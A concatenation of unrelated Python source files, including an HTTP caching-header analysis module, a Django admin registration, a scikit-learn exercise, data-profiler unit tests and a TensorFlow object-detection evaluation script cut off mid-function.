relative_time(int(freshness_lifetime), 0, 0) response.freshness_lifetime = freshness_lifetime fresh = freshness_left > 0 if has_explicit_freshness: if fresh: response.add_note(" ".join(freshness_hdrs), FRESHNESS_FRESH, freshness_lifetime=freshness_lifetime_str, freshness_left=freshness_left_str, current_age=current_age_str) elif has_cc_freshness and response.age > freshness_lifetime: response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_CACHE, freshness_lifetime=freshness_lifetime_str, freshness_left=freshness_left_str, current_age=current_age_str) else: response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_ALREADY, freshness_lifetime=freshness_lifetime_str, freshness_left=freshness_left_str, current_age=current_age_str) # can heuristic freshness be used? elif response.status_code in heuristic_cacheable_status: response.add_note('header-last-modified', FRESHNESS_HEURISTIC) else: response.add_note('', FRESHNESS_NONE) # can stale responses be served? if 'must-revalidate' in cc_keys: if fresh: response.add_note('header-cache-control', FRESH_MUST_REVALIDATE) elif has_explicit_freshness: response.add_note('header-cache-control', STALE_MUST_REVALIDATE) elif 'proxy-revalidate' in cc_keys or 's-maxage' in cc_keys: if fresh: response.add_note('header-cache-control', FRESH_PROXY_REVALIDATE) elif has_explicit_freshness: response.add_note('header-cache-control', STALE_PROXY_REVALIDATE) else: if fresh: response.add_note('header-cache-control', FRESH_SERVABLE) elif has_explicit_freshness: response.add_note('header-cache-control', STALE_SERVABLE) # public? if 'public' in cc_keys: # TODO: check for authentication in request response.add_note('header-cache-control', PUBLIC) class LM_FUTURE(Note): category = categories.CACHING level = levels.BAD summary = "The Last-Modified time is in the future." text = """\ The `Last-Modified` header indicates the last point in time that the resource has changed. %(response)s's `Last-Modified` time is in the future, which doesn't have any defined meaning in HTTP.""" class LM_PRESENT(Note): category = categories.CACHING level = levels.INFO summary = "The resource last changed %(last_modified_string)s." text = """\ The `Last-Modified` header indicates the last point in time that the resource has changed. It is used in HTTP for validating cached responses, and for calculating heuristic freshness in caches. This resource last changed %(last_modified_string)s.""" class METHOD_UNCACHEABLE(Note): category = categories.CACHING level = levels.INFO summary = "Responses to the %(method)s method can't be stored by caches." text = """\ """ class CC_MISCAP(Note): category = categories.CACHING level = levels.WARN summary = "The %(cc)s Cache-Control directive appears to have incorrect \ capitalisation." text = """\ Cache-Control directive names are case-sensitive, and will not be recognised by most implementations if the capitalisation is wrong. Did you mean to use %(cc_lower)s instead of %(cc)s?""" class CC_DUP(Note): category = categories.CACHING level = levels.WARN summary = "The %(cc)s Cache-Control directive appears more than once." text = """\ The %(cc)s Cache-Control directive is only defined to appear once; it is used more than once here, so implementations may use different instances (e.g., the first, or the last), making their behaviour unpredictable.""" class NO_STORE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s can't be stored by a cache." text = """\ The `Cache-Control: no-store` directive indicates that this response can't be stored by a cache.""" class PRIVATE_CC(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s only allows a private cache to store it." text = """\ The `Cache-Control: private` directive indicates that the response can only be stored by caches that are specific to a single user; for example, a browser cache. Shared caches, such as those in proxies, cannot store it.""" class PRIVATE_AUTH(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s only allows a private cache to store it." text = """\ Because the request was authenticated and this response doesn't contain a `Cache-Control: public` directive, this response can only be stored by caches that are specific to a single user; for example, a browser cache. Shared caches, such as those in proxies, cannot store it.""" class STOREABLE(Note): category = categories.CACHING level = levels.INFO summary = """\ %(response)s allows all caches to store it.""" text = """\ A cache can store this response; it may or may not be able to use it to satisfy a particular request.""" class NO_CACHE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served from cache without validation." text = """\ The `Cache-Control: no-cache` directive means that while caches **can** store this response, they cannot use it to satisfy a request unless it has been validated (either with an `If-None-Match` or `If-Modified-Since` conditional) for that request.""" class NO_CACHE_NO_VALIDATOR(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served from cache without validation." text = """\ The `Cache-Control: no-cache` directive means that while caches **can** store this response, they cannot use it to satisfy a request unless it has been validated (either with an `If-None-Match` or `If-Modified-Since` conditional) for that request. %(response)s doesn't have a `Last-Modified` or `ETag` header, so it effectively can't be used by a cache.""" class VARY_ASTERISK(Note): category = categories.CACHING level = levels.WARN summary = "Vary: * effectively makes this response uncacheable." text = """\ `Vary *` indicates that responses for this resource vary by some aspect that can't (or won't) be described by the server. This makes this response effectively uncacheable.""" class VARY_USER_AGENT(Note): category = categories.CACHING level = levels.INFO summary = "Vary: User-Agent can cause cache inefficiency." text = """\ Sending `Vary: User-Agent` requires caches to store a separate copy of the response for every `User-Agent` request header they see. Since there are so many different `User-Agent`s, this can "bloat" caches with many copies of the same thing, or cause them to give up on storing these responses at all. Consider having different URIs for the various versions of your content instead; this will give finer control over caching without sacrificing efficiency.""" class VARY_HOST(Note): category = categories.CACHING level = levels.WARN summary = "Vary: Host is not necessary." text = """\ Some servers (e.g., [Apache](http://httpd.apache.org/) with [mod_rewrite](http://httpd.apache.org/docs/2.4/mod/mod_rewrite.html)) will send `Host` in the `Vary` header, in the belief that since it affects how the server selects what to send back, this is necessary. This is not the case; HTTP specifies that the URI is the basis of the cache key, and the URI incorporates the `Host` header. The presence of `Vary: Host` may make some caches not store an otherwise cacheable response (since some cache implementations will not store anything that has a `Vary` header).""" class VARY_COMPLEX(Note): category = categories.CACHING level = levels.WARN summary = "This resource varies in %(vary_count)s ways." text = """\ The `Vary` mechanism allows a resource to describe the dimensions that its responses vary, or change, over; each listed header is another dimension. Varying by too many dimensions makes using this information impractical.""" class PUBLIC(Note): category = categories.CACHING level = levels.WARN summary = "Cache-Control: public is rarely necessary." text = """\ The `Cache-Control: public` directive makes a response cacheable even when the request had an `Authorization` header (i.e., HTTP authentication was in use). Therefore, HTTP-authenticated (NOT cookie-authenticated) resources _may_ have use for `public` to improve cacheability, if used judiciously. However, other responses **do not need to contain `public`**; it does not make the response "more cacheable", and only makes the response headers larger.""" class CURRENT_AGE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s has been cached for %(age)s." text = """\ The `Age` header indicates the age of the response; i.e., how long it has been cached since it was generated. HTTP takes this as well as any apparent clock skew into account in computing how old the response already is.""" class FRESHNESS_FRESH(Note): category = categories.CACHING level = levels.GOOD summary = "%(response)s is fresh until %(freshness_left)s from now." text = """\ A response can be considered fresh when its age (here, %(current_age)s) is less than its freshness lifetime (in this case, %(freshness_lifetime)s).""" class FRESHNESS_STALE_CACHE(Note): category = categories.CACHING level = levels.WARN summary = "%(response)s has been served stale by a cache." text = """\ An HTTP response is stale when its age (here, %(current_age)s) is equal to or exceeds its freshness lifetime (in this case, %(freshness_lifetime)s). HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances; e.g., when they lose contact with the origin server. Either that has happened here, or the cache has ignored the response's freshness directives.""" class FRESHNESS_STALE_ALREADY(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s is already stale." text = """\ A cache considers a HTTP response stale when its age (here, %(current_age)s) is equal to or exceeds its freshness lifetime (in this case, %(freshness_lifetime)s). HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances; e.g., when they lose contact with the origin server.""" class FRESHNESS_HEURISTIC(Note): category = categories.CACHING level = levels.WARN summary = "%(response)s allows a cache to assign its own freshness lifetime." text = """\ When responses with certain status codes don't have explicit freshness information (like a ` Cache-Control: max-age` directive, or `Expires` header), caches are allowed to estimate how fresh it is using a heuristic. Usually, but not always, this is done using the `Last-Modified` header. For example, if your response was last modified a week ago, a cache might decide to consider the response fresh for a day. Consider adding a `Cache-Control` header; otherwise, it may be cached for longer or shorter than you'd like.""" class FRESHNESS_NONE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s can only be served by a cache under exceptional circumstances." text = """\ %(response)s doesn't have explicit freshness information (like a ` Cache-Control: max-age` directive, or `Expires` header), and this status code doesn't allow caches to calculate their own. Therefore, while caches may be allowed to store it, they can't use it, except in unusual cirucumstances, such a when the origin server can't be contacted. This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive. Note that many caches will not store the response at all, because it is not generally useful to do so.""" class FRESH_SERVABLE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s may still be served by a cache once it becomes stale." text = """\ HTTP allows stale responses to be served under some circumstances; for example, if the origin server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness information). This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive.""" class STALE_SERVABLE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s might be served by a cache, even though it is stale." text = """\ HTTP allows stale responses to be served under some circumstances; for example, if the origin server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness information). This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive.""" class FRESH_MUST_REVALIDATE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served by a cache once it becomes stale." text = """\ The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy requests. For example, caches often use stale responses when they cannot connect to the origin server; when this directive is present, they will return an error rather than a stale response.""" class STALE_MUST_REVALIDATE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served by a cache, because it is stale." text = """\ The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy requests. For example, caches often use stale responses when they cannot connect to the origin server; when this directive is present, they will return an error rather than a stale response.""" class FRESH_PROXY_REVALIDATE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served by a shared cache once it becomes stale." text = """\ The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared caches (e.g., proxy caches) from using stale responses to satisfy requests. For example, caches often use stale responses when they cannot connect to the origin server; when this directive is present, they will return an error rather than a stale response. These directives do not affect private caches; for example, those in browsers.""" class STALE_PROXY_REVALIDATE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s cannot be served by a shared cache, because it is stale." text = """\ The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared caches (e.g., proxy caches) from using stale responses to satisfy requests. For example, caches often use stale responses when they cannot connect to the origin server; when this directive is present, they will return an error rather than a stale response. These directives do not affect private caches; for example, those in browsers.""" class CHECK_SINGLE(Note): category = categories.CACHING level = levels.WARN summary = "Only one of the pre-check and post-check Cache-Control directives is present." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. %(response)s uses only one of these directives; as a result, Internet Explorer will ignore the directive, since it requires both to be present. See [this blog entry](http://bit.ly/rzT0um) for more information. """ class CHECK_NOT_INTEGER(Note): category = categories.CACHING level = levels.WARN summary = "One of the pre-check/post-check Cache-Control directives has a non-integer value." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. Their values are required to be integers, but here at least one is not. As a result, Internet Explorer will ignore the directive. See [this blog entry](http://bit.ly/rzT0um) for more information.""" class CHECK_ALL_ZERO(Note): category = categories.CACHING level = levels.WARN summary = "The pre-check and post-check Cache-Control directives are both '0'." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. %(response)s gives a value of "0" for both; as a result, Internet Explorer will ignore the directive, since it requires both to be present. In other words, setting these to zero has **no effect** (besides wasting bandwidth), and may trigger bugs in some beta versions of IE. See [this blog entry](http://bit.ly/rzT0um) for more information.""" class CHECK_POST_BIGGER(Note): category = categories.CACHING level = levels.WARN summary = "The post-check Cache-control directive's value is larger than pre-check's." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. %(response)s assigns a higher value to `post-check` than to `pre-check`; this means that Internet Explorer will treat `post-check` as if its value is the same as `pre-check`'s. See [this blog entry](http://bit.ly/rzT0um) for more information.""" class CHECK_POST_ZERO(Note): category = categories.CACHING level = levels.BAD summary = "The post-check Cache-control directive's value is '0'." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. %(response)s assigns a value of "0" to `post-check`, which means that Internet Explorer will reload the content as soon as it enters the browser cache, effectively **doubling the load on the server**. See [this blog entry](http://bit.ly/rzT0um) for more information.""" class CHECK_POST_PRE(Note): category = categories.CACHING level = levels.INFO summary = "%(response)s may be refreshed in the background by Internet Explorer." text = """\ Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and `post-check`, to give more control over how its cache stores responses. Once it has been cached for more than %(post_check)s seconds, a new request will result in the cached response being served while it is refreshed in the background. However, if it has been cached for more than %(pre_check)s seconds, the browser will download a fresh response before showing it to the user. Note that these directives do not have any effect on other clients or caches. See [this blog entry](http://bit.ly/rzT0um) for more information.""" class DATE_CORRECT(Note): category = categories.GENERAL level = levels.GOOD summary = "The server's clock is correct." text = """\ HTTP's caching model assumes reasonable synchronisation between clocks on the server and client; using RED's local clock, the server's clock appears to be well-synchronised.""" class DATE_INCORRECT(Note): category = categories.GENERAL level = levels.BAD summary = "The server's clock is %(clock_skew_string)s." text = """\ Using RED's local clock, the server's clock does not appear to be well-synchronised. HTTP's caching model assumes reasonable synchronisation between clocks on the server and client; clock skew can cause responses that should be cacheable to be considered uncacheable (especially if their freshness lifetime is short). Ask your server administrator to synchronise the clock, e.g., using [NTP](http://en.wikipedia.org/wiki/Network_Time_Protocol Network Time Protocol). Apparent clock skew can also be caused by caching the response without adjusting the `Age` header; e.g., in a reverse proxy or Content Delivery network. See [this paper](http://www2.research.att.com/~edith/Papers/HTML/usits01/index.html) for more information. """ class AGE_PENALTY(Note): category = categories.GENERAL level = levels.WARN summary = "It appears that the Date header has been changed by an intermediary." text = """\ It appears that this response has been cached by a reverse proxy or Content Delivery Network, because the `Age` header is present, but the `Date` header is more recent than it indicates. Generally, reverse proxies should either omit the `Age` header (if they have another means of determining how fresh the response is), or leave the `Date` header alone (i.e., act as a normal HTTP cache). See [this paper](http://j.mp/S7lPL4) for more information.""" class DATE_CLOCKLESS(Note): category = categories.GENERAL level = levels.WARN summary = "%(response)s doesn't have a Date header." text = """\ Although HTTP allowes a server not to send a `Date` header if it doesn't have a local clock, this can make calculation of the response's age inexact.""" class DATE_CLOCKLESS_BAD_HDR(Note): category = categories.CACHING level = levels.BAD summary = "Responses without a Date aren't allowed to have Expires or Last-Modified values." text = """\ Because both the `Expires` and `Last-Modified` headers are date-based, it's necessary to know when the message was generated for them to be useful; otherwise, clock drift, transit times between nodes as well as caching could skew their application."""
StarcoderdataPython
11235037
<reponame>study-abacus/admin-site from django.contrib import admin from .models import Student, Course, Fee, Achievement, CI # Register your models here. admin.site.register(Student) admin.site.register(Course) admin.site.register(Fee) admin.site.register(Achievement) admin.site.register(CI)
StarcoderdataPython
9786662
# -*- coding: utf-8 -*- # --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: percent # format_version: '1.3' # jupytext_version: 1.11.5 # kernelspec: # display_name: Python 3 # name: python3 # --- # %% [markdown] # # 📝 Exercise M4.05 # In the previous notebook we set `penalty="none"` to disable regularization # entirely. This parameter can also control the **type** of regularization to use, # whereas the regularization **strength** is set using the parameter `C`. # Setting`penalty="none"` is equivalent to an infinitely large value of `C`. # In this exercise, we ask you to train a logistic regression classifier using the # `penalty="l2"` regularization (which happens to be the default in scikit-learn) # to find by yourself the effect of the parameter `C`. # # We will start by loading the dataset and create the helper function to show # the decision separation as in the previous code. # %% [markdown] # ```{note} # If you want a deeper overview regarding this dataset, you can refer to the # Appendix - Datasets description section at the end of this MOOC. # ``` # %% import pandas as pd penguins = pd.read_csv("../datasets/penguins_classification.csv") # only keep the Adelie and Chinstrap classes penguins = penguins.set_index("Species").loc[ ["Adelie", "Chinstrap"]].reset_index() culmen_columns = ["Culmen Length (mm)", "Culmen Depth (mm)"] target_column = "Species" # %% from sklearn.model_selection import train_test_split penguins_train, penguins_test = train_test_split(penguins, random_state=0) data_train = penguins_train[culmen_columns] data_test = penguins_test[culmen_columns] target_train = penguins_train[target_column] target_test = penguins_test[target_column] # %% [markdown] # First, let's create our predictive model. # %% from sklearn.pipeline import make_pipeline from sklearn.preprocessing import StandardScaler from sklearn.linear_model import LogisticRegression logistic_regression = make_pipeline( StandardScaler(), LogisticRegression(penalty="l2")) # %% [markdown] # Given the following candidates for the `C` parameter, find out the impact of # `C` on the classifier decision boundary. You can import the helper class with # `from helpers.plotting import DecisionBoundaryDisplay` to plot the decision # function boundary. Use the method `from_estimator` from this class. # %% Cs = [0.01, 0.1, 1, 10] # Write your code here. # %% [markdown] # Look at the impact of the `C` hyperparameter on the magnitude of the weights. # %% # Write your code here.
StarcoderdataPython
317743
from werkzeug.serving import run_simple from webapp import create_app import sys from os import path if __name__ == '__main__': project_dp = path.dirname(path.dirname(path.realpath(__file__))) sys.path.append(path.join(project_dp)) # to find any local resolvers app = create_app(config_file_path='/opt/loris/etc/loris2.conf') run_simple('0.0.0.0', 5004, app, use_debugger=False, use_reloader=False)
StarcoderdataPython
3290371
"""TODO""" import pandas import nltk nltk.download('punkt') # skip if already downloaded from sklearn.cross_validation import train_test_split from textblob.classifiers import NaiveBayesClassifier from arcode import anycode, clean_str class XcLassify(object): """TODO""" def __init__(self): self.__cl = None self.__traindata = None self.__testdata = None def _fetch_clean(self, filepath): """TODO""" dframe = pandas.read_excel(filepath) dframe.iloc[:, 0] = dframe.iloc[:, 0].map(clean_str) dframe.iloc[:, 0] = dframe.iloc[:, 0].map(anycode) return dframe.iloc[:, 0:2].to_records(index=False).tolist() def _split_data(self, datalist, test_ratio): """TODO""" self.__traindata, self.__testdata = train_test_split(datalist, test_size=test_ratio) return self.__traindata, self.__testdata def data_from_excel(self, filepath, test_ratio=0.24): datalist = self._fetch_clean(filepath) return self._split_data(datalist, 0.2) def train(self, update=False, new_data=None): """TODO""" if update and new_data: self.__cl.update(new_data) else: self.__cl = NaiveBayesClassifier(self.__traindata) def classify(self, text): """TODO""" text = clean_str(text, post_func=anycode) return self.__cl.classify(text) def benchmark(self, show_best_features=False): """TODO""" print('\nAccuracy: %0.3f\n' % self.__cl.accuracy(self.__testdata)) if show_best_features: self.__cl.show_informative_features() # test area if __name__ == '__main__': XCL = XcLassify() XCL.data_from_excel('data/data_sample.xlsx') XCL.train() print(XCL.classify("الباقة خلصت وسحب من الرصيد بدون اخطار قبلها!")) print(XCL.classify("ازاى اجدد باقة النت قبل ميعادها؟")) print(XCL.classify("لو سمحت عاوز اقدم شكوى فى الفرع")) XCL.benchmark(show_best_features=True) else: pass
StarcoderdataPython
8067997
import unittest from unittest import mock from collections import defaultdict import pandas as pd from data_profiler.profilers.unstructured_data_labeler_column_profile import UnstructuredDataLabelerProfile class TestUnstructuredDataLabelerProfile(unittest.TestCase): def test_char_level_counts(self): # setting up objects/profile default = UnstructuredDataLabelerProfile() sample = pd.Series(["abc123", "Bob", "!@##$%"]) # running update default.update(sample) # now getting entity_counts to check for proper structure self.assertEqual( {'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6}, default.profile["entity_counts"]["true_char_level"]) self.assertEqual( {'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6}, default.profile["entity_counts"]["postprocess_char_level"],) # assert it's not empty for now self.assertIsNotNone(default.profile) # then assert that correctly counted number of char samples self.assertEqual(default.char_sample_size, 15) def test_advanced_sample(self): # setting up objects/profile default = UnstructuredDataLabelerProfile() sample = pd.Series( ["Help\t<NAME>\tneeds\tfood.\tPlease\tCall\t555-301-1234." "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912." "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"]) # running update default.update(sample) # now getting entity_counts to check for proper structure self.assertEqual( {'BACKGROUND': 106, 'PERSON': 8, 'PHONE_NUMBER': 12, 'SSN': 20, 'BAN': 18, 'INTEGER': 3, 'ADDRESS': 3}, default.profile["entity_counts"]["true_char_level"]) # assert it's not empty for now self.assertIsNotNone(default.profile) def test_word_level_NER_label_counts(self): # setting up objects/profile default = UnstructuredDataLabelerProfile() sample = pd.Series( ["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234." "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000049939232194912." "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"]) # running update default.update(sample) # now getting entity_counts to check for proper structure self.assertEqual( {'BACKGROUND': 23,'PHONE_NUMBER': 1, 'SSN': 2, 'BAN': 1}, default.profile["entity_counts"]["word_level"]) # assert it's not empty for now self.assertIsNotNone(default.profile) def test_statistics(self): # setting up objects/profile default = UnstructuredDataLabelerProfile() sample = pd.Series( ["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234." "\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912." "\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"]) background_word_level_percent = 0.85185 background_true_char_level_percent = 0.62352 background_postprocess_level_percent = 0.705882 # running update default.update(sample) self.assertAlmostEqual( background_word_level_percent, default.entity_percentages['word_level']['BACKGROUND'], 3) self.assertAlmostEqual( background_true_char_level_percent, default.entity_percentages['true_char_level']['BACKGROUND'], 3) self.assertAlmostEqual( background_postprocess_level_percent, default.entity_percentages['postprocess_char_level']['BACKGROUND'], 3) self.assertEqual(27, default.word_sample_size) self.assertEqual(170, default.char_sample_size) self.assertEqual( 23, default.entity_counts['word_level']['BACKGROUND']) self.assertEqual( 106, default.entity_counts['true_char_level']['BACKGROUND']) self.assertEqual( 120, default.entity_counts['postprocess_char_level']['BACKGROUND']) self.assertIsNone(default._get_percentages('WRONG_INPUT')) default.update(sample) self.assertEqual(54, default.word_sample_size) self.assertEqual(340, default.char_sample_size) @mock.patch('data_profiler.profilers.' 'unstructured_data_labeler_column_profile.DataLabeler') @mock.patch('data_profiler.profilers.' 'unstructured_data_labeler_column_profile.' 'CharPostprocessor') def test_profile(self, processor_class_mock, model_class_mock): # setup mocks model_mock = mock.Mock() model_mock.reverse_label_mapping = {1: 'BACKGROUND'} model_mock.predict.return_value = dict(pred=[[1]]) model_class_mock.return_value = model_mock processor_mock = mock.Mock() processor_mock.process.return_value = dict(pred=[[]]) processor_class_mock.return_value = processor_mock # initialize labeler profile default = UnstructuredDataLabelerProfile() sample = pd.Series(["a"]) expected_profile = dict( entity_counts={ 'postprocess_char_level': defaultdict(int, {'BACKGROUND': 1}), 'true_char_level': defaultdict(int, {'BACKGROUND': 1}), 'word_level': defaultdict(int) }, times=defaultdict(float, {'data_labeler_predict': 1.0}) ) time_array = [float(i) for i in range(4, 0, -1)] with mock.patch('time.time', side_effect=lambda: time_array.pop()): default.update(sample) profile = default.profile # key and value populated correctly self.assertDictEqual(expected_profile, profile) if __name__ == '__main__': unittest.main()
StarcoderdataPython
6555466
import numpy as np import pandas as pd from pydantic import ValidationError from regression_model.config.core import config from regression_model.processing.schemas import MultipleHouseDataInputs def drop_na_inputs(*, input_data: pd.DataFrame) -> pd.DataFrame: """Check model inputs for na values and filter.""" # Columns in train data with missing values train_vars_with_na = ( config.model_config.categorical_vars_with_na_frequent + config.model_config.categorical_vars_with_na_missing + config.model_config.numerical_vars_with_na ) # At least one example in column var is missing new_vars_with_na = [ var for var in config.model_config.features if var not in train_vars_with_na and input_data[var].isnull().sum() > 0 ] # Drop rows return input_data.dropna(axis=0, subset=new_vars_with_na) def validate_inputs(*, input_data: pd.DataFrame) -> pd.DataFrame: """Check model inputs for unprocessable values.""" selected_features = config.model_config.features validated_data = input_data.rename(columns=config.model_config.variables_to_rename) validated_data = validated_data[selected_features].copy() validated_data = drop_na_inputs(input_data=validated_data) validated_data["MSSubClass"] = validated_data["MSSubClass"].astype("O") errors = None try: # Replace numpy nans so that pydantic can validate MultipleHouseDataInputs( inputs=validated_data.replace({np.nan: None}).to_dict(orient="records") ) except ValidationError as e: errors = e.json() return validated_data, errors
StarcoderdataPython
12836019
# Copyright 2017 Tensorflow. All Rights Reserved. # Modifications copyright 2018 <NAME>/<NAME> & <NAME> # We follow the object detection API of Tensorflow # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys import csv import numpy as np import tensorflow as tf import _init_paths from object_detection.utils import label_map_util from object_detection.utils import visualization_utils as vis_util from object_detection.utils import metrics from object_detection.utils import object_detection_evaluation as obj_eval from object_detection.core import standard_fields from skvideo.io import FFmpegWriter from skimage.io import imread tf.app.flags.DEFINE_string('gt_dir', '', 'Location of root directory for the ' 'ground truth data. Folder structure is assumed to be:' '<gt_dir>/cstopp_train.tfrecord,' '<gt_dir>/cstopp_test.tfrecord' '<gt_dir>/cstopp_val.tfrecord') tf.app.flags.DEFINE_string('det_dir', '', 'Location of root directory for the ' 'inference data. Folder structure is assumed to be:' '<det_dir>/cstopp_train.tfrecord,' '<det_dir>/cstopp_test.tfrecord' '<det_dir>/cstopp_val.tfrecord') tf.app.flags.DEFINE_string('output_dir', '', 'Path to which metrics' 'will be written.') tf.app.flags.DEFINE_string('split', 'train', 'Data split when record file is being read from gt_dir and det_dir ex: train, test, val') tf.app.flags.DEFINE_string( 'label_map_path', 'configs/cstopp_label_map.pbtxt', 'file path for the labels') tf.app.flags.DEFINE_integer( 'num_class', 1, 'Number of Classes to consider from 1 in the label map') tf.app.flags.DEFINE_boolean( 'is_vout', False, 'Generate a video with bounding boxes') FLAGS = tf.app.flags.FLAGS gt_feature = { 'image/object/bbox/ymin': tf.VarLenFeature(tf.float32), 'image/object/bbox/xmin': tf.VarLenFeature(tf.float32), 'image/object/bbox/ymax': tf.VarLenFeature(tf.float32), 'image/object/bbox/xmax': tf.VarLenFeature(tf.float32), 'image/object/class/label': tf.VarLenFeature(tf.int64), 'image/filename': tf.FixedLenFeature([], tf.string), 'image/object/difficult': tf.VarLenFeature(tf.int64), } det_feature = { 'image/object/bbox/ymin': tf.VarLenFeature(tf.float32), 'image/object/bbox/xmin': tf.VarLenFeature(tf.float32), 'image/object/bbox/ymax': tf.VarLenFeature(tf.float32), 'image/object/bbox/xmax': tf.VarLenFeature(tf.float32), 'image/object/class/label': tf.VarLenFeature(tf.int64), 'image/object/score': tf.VarLenFeature(tf.float32), 'image/filename': tf.FixedLenFeature([], tf.string), } class Reader: def __init__(self, record_path, split, is_infer=False): data_path = [] if is_infer: data_path.append(os.path.join(record_path, 'cstopp_inference_{}.tfrecord'.format(split))) else: data_path.append(os.path.join(record_path, 'cstopp_{}.tfrecord'.format(split))) self.read_graph = tf.Graph() with self.read_graph.as_default(): # old_graph_def = tf.GraphDef() self.filename_queue = tf.train.string_input_producer(data_path) self.reader = tf.TFRecordReader() self.num_records = 0 for f in data_path: self.num_records += sum(1 for _ in tf.python_io.tf_record_iterator(f)) # tf.import_graph_def(old_graph_def, name='') self.sess = tf.Session(graph=self.read_graph) def get_field(self, field, decode=False): if not decode: if type(self.features[field])==tf.SparseTensor: return tf.sparse_tensor_to_dense(self.features[field]) else: return self.features[field] else: return tf.image.decode_png(self.features[field]) def get_fields(self, feature_dict): # Modify graph to add these ops with self.read_graph.as_default(): list_fields = feature_dict.keys() # old_graph_def = tf.GraphDef() # Read next record from queue _, serialized_example = self.reader.read(self.filename_queue) self.features = tf.parse_single_example( serialized_example, features=feature_dict) # Get required fields from record fields_out = [self.get_field(f) for f in list_fields] # Close queue coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(sess=self.sess, coord=coord) # Import updated graph in current read_graph # tf.import_graph_def(old_graph_def, name='') eval_out = self.sess.run(fields_out) out_dict = dict(zip(list_fields, eval_out)) return out_dict def get_bbox(box_list): ymin_eval = box_list['image/object/bbox/ymin'] xmin_eval = box_list['image/object/bbox/xmin'] ymax_eval = box_list['image/object/bbox/ymax'] xmax_eval = box_list['image/object/bbox/xmax'] return np.vstack((ymin_eval,xmin_eval,ymax_eval,xmax_eval)).T def write_metrics(metrics, output_path): """Write metrics to the output directory. Args: metrics: A dictionary containing metric names and values. output_dir: Directory to write metrics to. """ tf.logging.info('Writing metrics.') with open(output_path, 'w') as csvfile: metrics_writer = csv.writer(csvfile, delimiter=',') for metric_name, metric_value in metrics.items(): metrics_writer.writerow([metric_name, str(metric_value)]) def evaluate(gt_dir=FLAGS.gt_dir, det_dir=FLAGS.det_dir, output_dir=FLAGS.output_dir, split='train', label_map_path=None, is_vout=False, num_class=1, fps_out=5): gt_reader = Reader(gt_dir, split) num_records = gt_reader.num_records det_reader = Reader(det_dir, split, is_infer=True) label_map = label_map_util.load_labelmap(label_map_path) categories = label_map_util.convert_label_map_to_categories( label_map, max_num_classes=num_class, use_display_name=True) evaluator = obj_eval.ObjectDetectionEvaluator(categories) output_path = os.path.join(output_dir, 'cstopp_{}_eval.csv'.format(split)) if is_vout: category_index = label_map_util.create_category_index(categories) list_valid_ids = [int(cat_dict['id']) for cat_dict in categories] vwriter = FFmpegWriter(os.path.join(output_dir,split+'_det_gt.mp4'), inputdict={'-r':str(fps_out)}, outputdict={'-r':str(fps_out)}) for image_num in range(0, num_records): print('Evaluating {}/{}'.format(image_num+1,num_records)) gt_fields = gt_reader.get_fields(gt_feature) gt_bbox = get_bbox(gt_fields) gt_classes = gt_fields['image/object/class/label'].astype(np.int32) gt_diff = gt_fields['image/object/difficult'] det_fields = det_reader.get_fields(det_feature) det_bbox = get_bbox(det_fields) det_scores = det_fields['image/object/score'] det_classes = det_fields['image/object/class/label'].astype(np.int32) filename = gt_fields['image/filename'] ground_dict = { standard_fields.InputDataFields.groundtruth_boxes: gt_bbox, 